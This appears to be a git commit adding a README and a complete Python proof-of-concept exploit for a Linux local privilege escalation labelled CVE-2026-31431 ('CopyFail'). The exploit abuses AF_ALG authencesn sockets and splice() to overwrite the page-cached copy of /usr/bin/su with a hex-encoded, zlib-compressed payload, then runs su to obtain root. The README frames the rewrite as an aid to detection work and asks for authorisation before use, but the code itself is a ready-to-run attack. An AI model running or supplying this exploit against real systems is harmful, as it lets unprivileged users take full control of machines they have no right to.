Adding CopyFail - CVE-2026-31431
This commit is contained in:
0xVoodoo
@@ -0,0 +1,18 @@
|
||||
# CopyFail | CVE-2026-31431 - Linux Privilege Escalation via Authencesn Scratch-Write Bug
|
||||
|
||||
Full writeup @ [my blog](https://0xvoodoo.sh/articles/copyfail/) | OG Writeup [here](https://xint.io/blog/copy-fail-linux-distributions#the-root-cause-page-cache-pages-in-the-writable-scatterlist-1)
|
||||
|
||||
This exploit has caused quite the panic among defenders, so I re-wrote/unminified [the original PoC](https://github.com/theori-io/copy-fail-CVE-2026-31431) to more easily look at detection opportunities.
|
||||
|
||||
In short, this exploit abuses the way `splice()` works and the AF_ALG socket type within [authencesn.c](https://github.com/torvalds/linux/blob/26fd6bff2c050196005312d1d306889220952a99/crypto/authencesn.c#L3) from the Linux crypto libraries. More or less, it allows the attacker to write 4 bytes of memory at a time to pagefiles, leading to the overwrite of the in-cache version of open files. When this is done with a SUID binary, like `/bin/su` the attacker is able to then execute the binary, which will pulls from the cache. This leaves the legit version of the overwritten binary in place while allowing arbitrary non-privileged users to gain root perms.
|
||||
|
||||
*Note* - this version needs at least Python 3.10
|
||||
|
||||
# License
|
||||
|
||||
GPL v3.0 - as all good software should be
|
||||
|
||||
Only use with explicit permission from the target system owner.
|
||||
|
||||
Remember - don't be a skid :)
|
||||
|
||||
@@ -0,0 +1,38 @@
|
||||
import os, zlib, socket
|
||||
|
||||
|
||||
def exploit(zlib_payload, su_file, counter):
|
||||
|
||||
listener = socket.socket(38, 5, 0)
|
||||
listener.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))
|
||||
|
||||
listener.setsockopt(279, 1, bytes.fromhex('0800010000000010'+'0'*64))
|
||||
listener.setsockopt(279, 5, None, 4)
|
||||
|
||||
connection, _ = listener.accept()
|
||||
|
||||
connection.sendmsg([b"A"*4+zlib_payload], [(279, 3, b'\x00'*4), (279, 2, b'\x10'+b'\x00'*19), (279, 4, b'\x08' + b'\x00' * 3),], 32768)
|
||||
|
||||
stdin, stdout = os.pipe()
|
||||
|
||||
os.splice(su_file, stdout, counter + 4, offset_src=0)
|
||||
os.splice(stdin, connection.fileno(), counter + 4)
|
||||
|
||||
try:
|
||||
connection.recv(8 + counter)
|
||||
except:
|
||||
0
|
||||
|
||||
if __name__ == "__main__":
|
||||
|
||||
zlib_payload = zlib.decompress(bytes.fromhex("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
|
||||
|
||||
su_file = os.open("/usr/bin/su", 0)
|
||||
|
||||
i = 0
|
||||
|
||||
while i < len(zlib_payload):
|
||||
exploit(zlib_payload[i:i+4], su_file, i)
|
||||
i += 4
|
||||
|
||||
os.system("su")
|
||||
Reference in New Issue
Block a user